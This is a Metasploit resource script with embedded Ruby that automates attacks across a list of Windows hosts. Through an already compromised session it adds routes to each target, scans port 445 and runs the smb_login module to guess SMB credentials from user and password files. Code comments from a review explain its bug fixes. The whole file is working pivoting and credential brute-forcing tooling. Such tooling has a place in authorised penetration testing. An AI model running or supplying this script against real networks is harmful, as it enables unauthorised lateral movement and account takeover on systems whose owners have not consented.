# checkpass.rc
# 1. routes traffic to each target host through a session
# 2. runs smb_login through that session if port 445 is open on the target
# Options are read from the framework datastore; set them globally with setg
# Required options
# RHOST_FILE - target host file, one per line
# SESSION - session to run through
# PASS_FILE - password file
# USER_FILE - user file
<ruby>
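# Datastore options read directly by this script (the header above lists the rest;
# USER_FILE / PASS_FILE are not touched here and are presumably picked up by the
# smb_login module from the global datastore -- verify against the module's options):
#   RHOST_FILE - path of the target list, one host per line, '#' lines are comments
#   SESSION    - session used for resolve_hostname and (via the global datastore) routing
#   NETMASK    - optional; when set, SUBNET is used as the target address instead of
#                resolving the hostname through the session
#   SUBNET     - optional; the address used when NETMASK is set
rhost_file = framework.datastore['RHOST_FILE']
session_id = framework.datastore['SESSION']

if rhost_file.nil? || session_id.nil?
  # Fail loudly up front instead of raising a TypeError out of File.foreach(nil).
  print_error("ERROR: RHOST_FILE and SESSION must be set before running this script")
else
  # File.foreach instead of Kernel#open: Kernel#open spawns a command when the path
  # starts with "|", and the block form closes the handle even if an iteration raises.
  File.foreach(rhost_file) do |line|
    rhost = line.strip
    # Skip blanks and comments; a host containing whitespace would be split into extra
    # arguments by the "set HOSTNAME ..." command below, so skip those as well.
    next if rhost.empty? || rhost.start_with?("#") || rhost =~ /\s/

    print_line("#####################")
    print_line("# Beginning #{rhost}")
    print_line("#####################")

    print_line("#####################")
    print_line("# Routing through Session #{session_id}")
    print_line("#####################")
    # Drop any route left over from the previous host before adding a new one.
    run_single("route flush")

    # Work out the address to route to: resolve the hostname through the session, or
    # take the operator-supplied SUBNET when NETMASK is set.
    ip = nil
    if framework.datastore['NETMASK'].nil?
      run_single("use post/windows/recon/resolve_hostname")
      run_single("set SESSION #{session_id}")
      run_single("set HOSTNAME #{rhost}")
      run_single("run")
      # h.name may be nil for hosts recorded without a name; to_s keeps the comparison safe.
      resolved = framework.db.hosts.find { |h| h.name.to_s.chomp == rhost }
      ip = resolved.address if resolved
    else
      ip = framework.datastore['SUBNET']
    end

    # nil covers both "hostname did not resolve" and "NETMASK set but SUBNET missing";
    # move on to the next host rather than abandoning the whole list.
    if ip.nil?
      print_error("Session or host might be invalid. Skipping #{rhost}")
      next
    end

    run_single("use post/windows/manage/autoroute")
    # Broad netmask for now; the route is flushed again before the next host and at the end.
    run_single("set NETMASK 255.0.0.0")
    run_single("set SUBNET #{ip}")
    run_single("run")

    print_line("#####################")
    print_line("# PORTSCANNING #{rhost}")
    print_line("#####################")
    run_single("use auxiliary/scanner/portscan/tcp")
    run_single("set RHOSTS #{ip}")
    run_single("set PORTS 445")
    run_single("run")

    # The scan result is read back from the db host record that carries this hostname.
    # NOTE(review): the scan targets ip, so the open port may be recorded on a host
    # entry matched by address rather than by name -- confirm against the db schema.
    smb_open = framework.db.hosts.any? do |h|
      h.name == rhost && h.services.any? { |s| s.port == 445 }
    end

    unless smb_open
      print_error("port 445 was not enabled, skipping #{rhost}")
      next
    end
    print_line "SMB is enabled. Continuing"

    print_line("#####################")
    print_line("# Running smb_login")
    print_line("#####################")
    run_single("use auxiliary/scanner/smb/smb_login")
    run_single("set RHOSTS #{ip}")
    run_single("set BLANK_PASSWORDS false")
    run_single("set STOP_ON_SUCCESS true")
    run_single("set USER_AS_PASS false")
    run_single("run")
    # Fall through to the next host; the original returned here, which ended the run
    # after the first host and skipped the route cleanup below.
  end

  print_line("#####################")
  print_line("# Cleaning up: Resetting routes")
  print_line("#####################")
  run_single("route flush")
end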
</ruby>